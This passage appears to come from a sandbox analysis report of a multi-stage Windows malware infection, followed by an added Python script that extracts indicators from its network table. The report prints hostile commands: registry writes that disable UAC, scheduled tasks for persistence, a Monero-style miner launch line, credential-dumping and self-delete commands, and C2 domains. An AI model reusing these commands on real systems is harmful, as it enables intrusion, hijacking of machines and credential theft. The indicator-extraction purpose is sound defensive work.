PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 1528 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\Opus.exe
PID 1528 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\Opus.exe
PID 1528 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\Opus.exe
PID 1528 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\Opus.exe
PID 1528 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\aaa.exe
PID 1528 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\aaa.exe
PID 1528 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\aaa.exe
PID 1528 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\aaa.exe
PID 2564 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2564 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2564 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2564 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2564 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\ProgramData\Start Menu\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\ProgramData\Start Menu\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\ProgramData\Start Menu\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A

Uses Task Scheduler COM API

persistence

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\aaa.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe

"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"

C:\Users\Admin\AppData\Roaming\healastounding.exe

"C:\Users\Admin\AppData\Roaming\healastounding.exe"

C:\Users\Admin\AppData\Roaming\Pluto Panel.exe

"C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"

C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"

C:\Users\Admin\AppData\Roaming\test.exe

"C:\Users\Admin\AppData\Roaming\test.exe"

C:\Users\Admin\AppData\Roaming\22.exe

"C:\Users\Admin\AppData\Roaming\22.exe"

C:\Users\Admin\AppData\Roaming\gay.exe

"C:\Users\Admin\AppData\Roaming\gay.exe"

C:\Users\Admin\AppData\Roaming\___11.19.exe

"C:\Users\Admin\AppData\Roaming\___11.19.exe"

C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"

C:\Users\Admin\AppData\Roaming\Opus.exe

"C:\Users\Admin\AppData\Roaming\Opus.exe"

C:\Users\Admin\AppData\Roaming\aaa.exe

"C:\Users\Admin\AppData\Roaming\aaa.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\\svchost.exe

C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"

C:\Users\Admin\AppData\Roaming\4.exe

"C:\Users\Admin\AppData\Roaming\4.exe"

C:\Users\Admin\AppData\Roaming\a.exe

"C:\Users\Admin\AppData\Roaming\a.exe"

C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe

"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"

C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe

"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"

C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe

"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"

C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"

C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe

"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add policy name=Block

C:\Users\Admin\AppData\Roaming\3.exe

"C:\Users\Admin\AppData\Roaming\3.exe"

C:\Windows\SysWOW64\TXPlatforn.exe

C:\Windows\SysWOW64\TXPlatforn.exe -auto

C:\Windows\SysWOW64\TXPlatforn.exe

C:\Windows\SysWOW64\TXPlatforn.exe -acsi

C:\Users\Admin\AppData\Local\Temp\svchos.exe

C:\Users\Admin\AppData\Local\Temp\\svchos.exe

C:\Users\Admin\AppData\Roaming\HD____11.19.exe

C:\Users\Admin\AppData\Roaming\HD____11.19.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "ISS Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpAA91.tmp"

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"

C:\Users\Admin\AppData\Roaming\mediaget.exe

"C:\Users\Admin\AppData\Roaming\mediaget.exe"

C:\Windows\SysWOW64\PING.EXE

ping -n 2 127.0.0.1

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filterlist name=Filter1

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "ISS Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpC5B0.tmp"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "0fd7de5367376231a788872005d7ed4f" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\0fd7de5367376231a788872005d7ed4f.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1420090574490970998-1514513884419101326-171104240-183127650733380225-1896207397"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\KBDVNTC\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "a" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb\a.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TXPlatforn" /sc ONLOGON /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\TXPlatforn.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\ProgramData\Start Menu\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Documents and Settings\taskhost.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ckwNq3q2sC.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe

C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\259437400.txt",MainThread

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filteraction name=FilteraAtion1 action=block

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1

C:\ProgramData\Start Menu\dllhost.exe

"C:\ProgramData\Start Menu\dllhost.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static set policy name=Block assign=y

C:\Windows\Help\Winlogon.exe

C:\Windows\Help\Winlogon.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c del "C:\Users\Admin\AppData\Roaming\22.exe"

C:\Windows\SysWOW64\svchost.exe

C:\Windows\system32\svchost.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 216

C:\Windows\Cursors\WUDFhosts.exe

C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x

C:\Users\Admin\AppData\Roaming\aaa.exe

"C:\Users\Admin\AppData\Roaming\aaa.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 804

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\259457134.bat" "C:\Users\Admin\AppData\Roaming\aaa.exe" "

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

Network

Country Destination Domain Proto
MD 194.180.174.53:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 pretorian.ac.ug udp
MD 194.180.174.53:80 tcp
CN 59.56.110.231:8898 tcp
US 8.8.8.8:53 prepepe.ac.ug udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 gfhhjgh.duckdns.org udp
RU 80.87.192.115:80 tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
US 8.8.8.8:53 yabynennet.xyz udp
US 104.155.138.21:81 yabynennet.xyz tcp
US 8.8.8.8:53 pretorian.ac.ug udp
US 8.8.8.8:53 whatismyipaddress.com udp
HU 91.219.236.18:80 91.219.236.18 tcp
US 104.19.222.79:80 whatismyipaddress.com tcp
US 104.19.222.79:443 whatismyipaddress.com tcp
CA 172.98.92.42:58491 tcp
US 104.19.222.79:443 whatismyipaddress.com tcp
US 8.8.8.8:53 kazya1.hopto.org udp
MD 194.180.174.41:80 tcp
RU 92.63.107.12:80 tcp
MD 194.180.174.41:80 tcp
US 8.8.8.8:53 22ssh.com udp
HU 91.219.236.148:80 tcp
US 8.8.8.8:53 pool.usa-138.com udp
SG 45.77.45.115:80 pool.usa-138.com tcp
HU 91.219.236.148:80 tcp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
RU 80.87.192.115:80 tcp
RU 92.63.107.12:80 tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 files.000webhost.com udp
CA 172.98.92.42:58491 tcp
RU 80.87.192.115:80 tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
N/A 127.0.0.1:58491 tcp
N/A 127.0.0.1:58491 tcp
RU 80.87.192.115:80 tcp
N/A 127.0.0.1:58491 tcp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 gfhhjgh.duckdns.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
RU 80.87.192.115:80 tcp
CA 172.98.92.42:58491 tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
CA 172.98.92.42:58491 tcp
RU 80.87.192.115:80 tcp
N/A 127.0.0.1:58491 tcp
N/A 127.0.0.1:58491 tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
RU 80.87.192.115:80 tcp
N/A 127.0.0.1:58491 tcp
CA 172.98.92.42:58491 tcp
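Read as a whole, the table mixes the DNS queries the sample sent to 8.8.8.8 with the TCP connections that followed, and lists the same endpoints many times. The script below is an added example, not part of the report: it pairs each domain with the address:port it was seen connecting to on the rows that carry both, separates the external-IP lookup services from the remaining endpoints, skips loopback rows, and flags domains under dynamic-DNS providers. The rows are a constructed subset of the table above; the dynamic-DNS suffix list and the set of IP-check services are assumptions, and a DNS query with no matching connection row (pretorian.ac.ug, kazya1.hopto.org and hackerinvasion.f3322.net in this subset) is reported separately rather than inferred.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: a subset of the rows from the Network table (Country Destination Domain Proto).
NETWORK_ROWS = """\
MD 194.180.174.53:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 pretorian.ac.ug udp
CN 59.56.110.231:8898 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 gfhhjgh.duckdns.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
US 8.8.8.8:53 whatismyipaddress.com udp
HU 91.219.236.18:80 91.219.236.18 tcp
US 104.19.222.79:443 whatismyipaddress.com tcp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 pool.usa-138.com udp
SG 45.77.45.115:80 pool.usa-138.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
N/A 127.0.0.1:58491 tcp
CA 172.98.92.42:58491 tcp
"""

DDNS_SUFFIXES = (".duckdns.org", ".hopto.org", ".f3322.net")      # assumed dynamic-DNS providers
IP_CHECK_SERVICES = {"api.ipify.org", "whatismyipaddress.com"}    # assumed benign IP-lookup services
RESOLVERS = {"8.8.8.8"}                                           # resolver used by the sandbox

ROW = re.compile(
    r"^(?P<cc>\S+)\s+(?P<ip>[\d.]+):(?P<port>\d+)(?:\s+(?P<domain>\S+))?\s+(?P<proto>tcp|udp)$"
)


def parse_rows(text):
    """Parse the flattened table; a 'domain' that is just the IP again is treated as absent."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["port"] = int(d["port"])
        if d["domain"] == d["ip"]:
            d["domain"] = None
        rows.append(d)
    return rows


def extract_iocs(rows):
    lookups, resolved, conns = set(), defaultdict(set), Counter()
    for r in rows:
        if r["proto"] == "udp" and r["port"] == 53 and r["ip"] in RESOLVERS:
            if r["domain"]:
                lookups.add(r["domain"])          # a query, not a connection
            continue
        if r["ip"].startswith("127."):
            continue                              # loopback chatter is not an external indicator
        ep = f"{r['ip']}:{r['port']}"
        conns[ep] += 1
        if r["domain"]:
            resolved[r["domain"]].add(ep)
    ep_to_domain = {ep: d for d, eps in resolved.items() for ep in eps}
    ipcheck_eps = {ep for ep, d in ep_to_domain.items() if d in IP_CHECK_SERVICES}
    all_domains = lookups | set(resolved)
    candidates = [
        {"endpoint": ep, "count": n, "domain": ep_to_domain.get(ep)}
        for ep, n in sorted(conns.items(), key=lambda kv: (-kv[1], kv[0]))
        if ep not in ipcheck_eps
    ]
    return {
        "dns_lookups": sorted(lookups),
        "resolved": {d: sorted(eps) for d, eps in resolved.items()},
        "unresolved_lookups": sorted(lookups - set(resolved)),
        "ddns_domains": sorted(d for d in all_domains if d.endswith(DDNS_SUFFIXES)),
        "ipcheck_endpoints": sorted(ipcheck_eps),
        "c2_candidates": candidates,
    }


if __name__ == "__main__":
    for k, v in extract_iocs(parse_rows(NETWORK_ROWS)).items():
        print(k, v)
```

The pairing is positional, not authoritative: the table reports the domain only on connection rows where the sandbox attributed one, so a domain may legitimately appear under `unresolved_lookups` even though the sample later connected to its address without the attribution. Treat `c2_candidates` as a ranked starting list, not a verdict.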

Files

memory/1364-0-0x0000000074921000-0x0000000074922000-memory.dmp

memory/1364-1-0x0000000074920000-0x0000000074ECB000-memory.dmp

memory/1364-2-0x0000000074920000-0x0000000074ECB000-memory.dmp

C:\Users\Admin\AppData\Roaming\healastounding.exe

MD5 6fb798f1090448ce26299c2b35acf876
SHA1 451423d5690cffa02741d5da6e7c45bc08aefb55
SHA256 b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f
SHA512 9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3

\Users\Admin\AppData\Roaming\Pluto Panel.exe

MD5 ed666bf7f4a0766fcec0e9c8074b089b
SHA1 1b90f1a4cb6059d573fff115b3598604825d76e6
SHA256 d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264
SHA512 d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49

C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

MD5 0fd7de5367376231a788872005d7ed4f
SHA1 658e4d5efb8b14661967be2183cc60e3e561b2b6
SHA256 9083992637e90e412e6f4e77331eb69ee8db821c54bbc38533e0f889cc4ca9dd
SHA512 522d5be2803fbce0d12c325cc2ef1e3a92cec03aeba7d1164530093ad58caecd827dd557ca3c182a66c6667150e731de37bb552d19425f96cc78fe3423e1a863

\Users\Admin\AppData\Roaming\Opus.exe

MD5 759185ee3724d7563b709c888c696959
SHA1 7c166cc3cbfef08bb378bcf557b1f45396a22931
SHA256 9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641
SHA512 ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c

C:\Users\Admin\AppData\Roaming\aaa.exe

MD5 860aa57fc3578f7037bb27fc79b2a62c
SHA1 a14008fe5e1eb88bf46266de3d5ee5db2e0a722b
SHA256 5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29
SHA512 6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1

\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

MD5 8f1c8b40c7be588389a8d382040b23bb
SHA1 bef5209ae90a3bd3171e1e0be4e8148c4ccd8a6a
SHA256 ed58ffee46a583c177c792b56c9fc20ccd9509d125f2e3fc90c4f48de7e2c2a1
SHA512 9192b6f2f8320a728c445f9cd6e6d66495ad0ebebd7ff193dc09ee8ae57b3933c1b75dc208e7d638db273cb9d31b4ca24ee7bfd9729ff0cdbf432d72bb322b1f

C:\Windows\SysWOW64\TXPlatforn.exe

MD5 a4329177954d4104005bce3020e5ef59
SHA1 23c29e295e2dbb8454012d619ca3f81e4c16e85a
SHA256 6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd
SHA512 81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208

C:\Users\Admin\AppData\Roaming\4.exe

MD5 e6dace3f577ac7a6f9747b4a0956c8d7
SHA1 86c71169025b822a8dfba679ea981035ce1abfd1
SHA256 8b4b846fe1023fa173ab410e3a5862a4c09f16534e14926878e387092e7ffb63
SHA512 1c8554d3d9a1b1509ba1df569ede3fb7a081bef84394c708c4f1a2fb8779f012c74fbf6de085514e0c8debb5079cc23c6c6112b95bf2f0ab6a8f0bd156a3e268

\Users\Admin\AppData\Roaming\22.exe

MD5 dbf9daa1707b1037e28a6e0694b33a4b
SHA1 ddc1fcec1c25f2d97c372fffa247969aa6cd35ef
SHA256 a604a3ff78644533fac5ee9f198e9c5f2fa1ae2a5828186367a9e00935cff6b6
SHA512 145b606ffd58554050ff8712ddb38c1c66dd5f33ea15fd48474e1c165b2c0348d2413e16c7ad07ff1c65ce71e2be23e3758e6d48c4f2454d5407982119706bfd

C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe

MD5 870d6e5aef6dea98ced388cce87bfbd4
SHA1 2d7eee096d38d3c2a8f12fcba0a44b4c4da33d54
SHA256 6d50833895b2e3eb9d6f879a6436660127c270b6a516cda0253e56a3d8b7fba0
SHA512 0d55ab28b2f80136af121b870b7503551d87bbeb2848cf9a32540006cac9a5e346d9fcce2bf1223a22927f72a147b81487533a10b91373d4fa4429d6159fd566

memory/3048-160-0x0000000000400000-0x0000000000438000-memory.dmp

memory/1904-164-0x0000000000400000-0x00000000007C2000-memory.dmp

\Users\Admin\AppData\Roaming\3.exe

MD5 748a4bea8c0624a4c7a69f67263e0839
SHA1 6955b7d516df38992ac6bff9d0b0f5df150df859
SHA256 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e
SHA512 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

memory/1536-195-0x0000000000BD0000-0x0000000000C64000-memory.dmp

memory/2076-163-0x0000000000CA0000-0x0000000000CB2000-memory.dmp

C:\Users\Admin\AppData\Roaming\HD____11.19.exe

MD5 b14120b6701d42147208ebf264ad9981
SHA1 f3cff7ac8e6c1671d2c3387648e54f80957196de
SHA256 d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97
SHA512 27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b

memory/1028-158-0x0000000000400000-0x0000000000495000-memory.dmp

memory/3048-156-0x0000000000400000-0x0000000000438000-memory.dmp

memory/1796-135-0x0000000000220000-0x0000000000230000-memory.dmp

memory/1796-134-0x0000000000220000-0x0000000000230000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe

MD5 78d40b12ffc837843fbf4de2164002f6
SHA1 985bdffa69bb915831cd6b81783aef3ae4418f53
SHA256 308a15dabdc4ce6b96dd54954a351d304f1fcb59e8c93221ba1c412bcdfd1c44
SHA512 c6575e1771d37ded4089d963bea95deac78b329ed555c991d7c559ee1970dd0887a965e88c09981529adc9c25df5cfd3d57e3dce6724da1f01f1198f0f460b79

memory/1028-148-0x0000000000400000-0x0000000000495000-memory.dmp

memory/2852-140-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2852-138-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1528-124-0x0000000074920000-0x0000000074ECB000-memory.dmp

memory/1904-121-0x0000000000400000-0x00000000007C2000-memory.dmp

memory/1904-120-0x0000000000400000-0x00000000007C2000-memory.dmp

memory/1528-119-0x00000000058E0000-0x0000000005CA2000-memory.dmp

C:\Users\Admin\AppData\Roaming\a.exe

MD5 52cfd35f337ca837d31df0a95ce2a55e
SHA1 88eb919fa2761f739f02a025e4f9bf1fd340b6ff
SHA256 5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448
SHA512 b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73

memory/3032-98-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/3032-97-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/3032-95-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/1364-83-0x0000000074920000-0x0000000074ECB000-memory.dmp

C:\Users\Admin\AppData\Roaming\___11.19.exe

MD5 a071727b72a8374ff79a695ecde32594
SHA1 b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc
SHA256 8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745
SHA512 854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400

